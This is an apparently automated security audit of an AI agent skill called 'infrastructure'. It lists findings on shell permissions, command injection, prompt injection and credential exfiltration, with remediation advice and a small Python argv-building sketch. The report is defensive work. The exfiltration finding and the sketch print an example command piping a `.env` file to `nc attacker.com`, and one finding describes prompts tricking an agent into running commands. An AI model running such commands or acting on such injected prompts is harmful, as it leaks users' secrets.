Trust Assessment
The skill "infrastructure" received a trust score of 65/100, placing it in the Caution category. This skill has security considerations that users should review before deployment.
SkillShield's automated analysis identified 5 findings: 2 critical, 2 high, 1 medium, and 0 low severity. Key findings include an excessive 'Bash' permission declared in the skill manifest, a high risk of command injection due to the 'Bash' permission combined with auto-execution directives, and potential data exfiltration via credential access and 'Bash' execution.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, and LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 3/100, indicating serious behavioral-safety risks.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (5)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | **Excessive 'Bash' permission declared in skill manifest.** The skill declares the 'Bash' permission in its manifest, allowing arbitrary shell command execution. This extremely powerful permission significantly increases the attack surface for command injection, data exfiltration, and system compromise, and the skill's instruction to 'Auto-execute with credentials' exacerbates the risk. Remediation: restrict permissions to the absolute minimum required; avoid 'Bash' unless strictly necessary, and implement robust input sanitization and sandboxing. If shell execution is required, use a more constrained tool or a dedicated, sandboxed environment. | LLM | SKILL.md:1 |
| CRITICAL | **High risk of command injection due to 'Bash' permission and auto-execution directives.** The skill is designed to 'Auto-execute with credentials' and to 'EXECUTE directly' if credentials are found, while holding the 'Bash' permission. Malicious user input incorporated into shell commands could therefore lead to arbitrary command execution on the host system. The skill explicitly uses `grep`, `wrangler`, and `aws` commands, confirming its intent to execute shell commands. Remediation: remove the 'Bash' permission if possible; otherwise, strictly validate and sanitize any user-provided data used in shell commands, and prefer safer alternatives to direct shell execution, such as dedicated APIs or sandboxed environments. | LLM | SKILL.md:46 |
| HIGH | **Potential data exfiltration via credential access and 'Bash' execution.** The skill explicitly checks for credentials in `.env` files and via `wrangler` and `aws` commands. Combined with the 'Bash' and 'Read' permissions, a compromised skill could easily exfiltrate sensitive data, including environment variables, API keys, or other files accessible to the agent, by executing a command such as `cat .env \| nc attacker.com`. Remediation: restrict file read access to only necessary paths; avoid reading sensitive files like `.env` directly. If credential checks are needed, use secure, sandboxed methods that do not expose file contents or allow arbitrary command execution. | LLM | SKILL.md:51 |
| HIGH | **Highly susceptible to prompt injection due to direct execution directives.** The skill contains strong directives such as 'Auto-execute with credentials' and 'If credentials found → EXECUTE directly'. A malicious user could craft prompts that trick the LLM into believing these conditions are met, leading to unintended and potentially harmful command execution, especially given the 'Bash' permission. Remediation: rephrase directives to be less absolute, incorporate more robust internal checks before executing sensitive operations, and implement strict input validation and guardrails so user prompts cannot directly trigger or influence critical execution paths. | LLM | SKILL.md:46 |
| MEDIUM | **Potential credential harvesting when credentials are requested.** The skill states 'If credentials missing → ASK, then execute'. If the skill is compromised, or if the 'ASK' mechanism is not securely implemented, it could be used to prompt the user for sensitive credentials and then exfiltrate them. Remediation: handle any credential prompt through a secure, isolated component of the host system, not directly by the LLM; credentials should never be processed or stored by the skill itself. | LLM | SKILL.md:47 |
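The command-injection and exfiltration findings above share one root cause: untrusted input interpolated into a shell string. A minimal Python sketch of the remediation the report recommends (argument lists instead of shell strings, plus an allow-list) is shown below. The `build_command` helper and the `ALLOWED_BINARIES` set are illustrative assumptions, not part of the audited skill:

```python
import subprocess  # commands would be run with subprocess.run(cmd, shell=False)

# Hypothetical allow-list: only the binaries the report mentions.
ALLOWED_BINARIES = {"grep", "wrangler", "aws"}

def build_command(binary: str, *user_args: str) -> list[str]:
    """Build an argv list so user input is passed as literal arguments
    and is never parsed by a shell (mitigates the injection finding)."""
    if binary not in ALLOWED_BINARIES:
        raise ValueError(f"binary {binary!r} is not allow-listed")
    # With an argv list and shell=False, metacharacters such as ';'
    # and '|' inside user_args are plain data, not shell syntax.
    return [binary, *user_args]

# A payload that would chain commands under shell=True is inert here:
cmd = build_command("grep", "-e", "pattern; cat .env | nc attacker.com", "app.log")
# subprocess.run(cmd, shell=False)  # the whole payload is one literal argument
```

The key design choice is that the caller never builds a command string at all, so there is nothing for a shell to re-parse; the allow-list additionally blocks a compromised prompt from invoking arbitrary binaries.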